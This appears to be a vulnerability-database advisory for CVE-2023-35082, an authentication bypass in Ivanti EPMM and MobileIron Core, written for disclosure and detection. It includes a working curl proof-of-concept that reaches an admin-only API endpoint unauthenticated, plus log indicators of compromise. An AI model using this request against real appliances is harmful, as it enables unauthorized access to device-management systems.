9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.968 High
EPSS
Percentile
99.7%
An authentication bypass vulnerability in Ivanti EPMM 11.10 and older, allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is unique to CVE-2023-35078 announced earlier.
Recent assessments:
sfewer-r7 at August 03, 2023 9:02am UTC reported:
Update: August 8, 2023: Ivanti have indicated that CVE-2023-35082 affects all versions of Endpoint Manager Mobile (EPMM) prior to a patch released August 7, 2023. The attacker rating value for CVE-2023-35082 has been increased to reflect the new product versions affected by this vulnerability.
CVE-2023-35082 gives an attacker unauthenticated API access to a vulnerable Ivanti Endpoint Manager Mobile (EPMM) or MobileIron Core target.
An attacker can access the MobileIron Core API unauthenticated, by including /asfV3/
in the URL path, for example:
c:\> curl -k https://192.168.86.103/mifs/asfV3/api/v2/ping
This will successfully call the ping API endpoint, which is meant to require authentication from a user with admin role privileges, and the following result is returned:
{"results":{"apiVersion":2.0,"vspVersion":"VSP 11.2.0.0 Build 31 "}}
The /var/log/httpd/https-access_log
log file on the appliance will show indicators of compromise for entries containing /mifs/asfV3/api/v2/
in the path and a HTTP response code of 200. For example:
192.168.86.34:61736 - - 2023-07-28--15-24-51 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 200 68 "-" "curl/8.0.1" 3285
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35082
forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
github.com/Chocapikk/CVE-2023-35082
www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.968 High
EPSS
Percentile
99.7%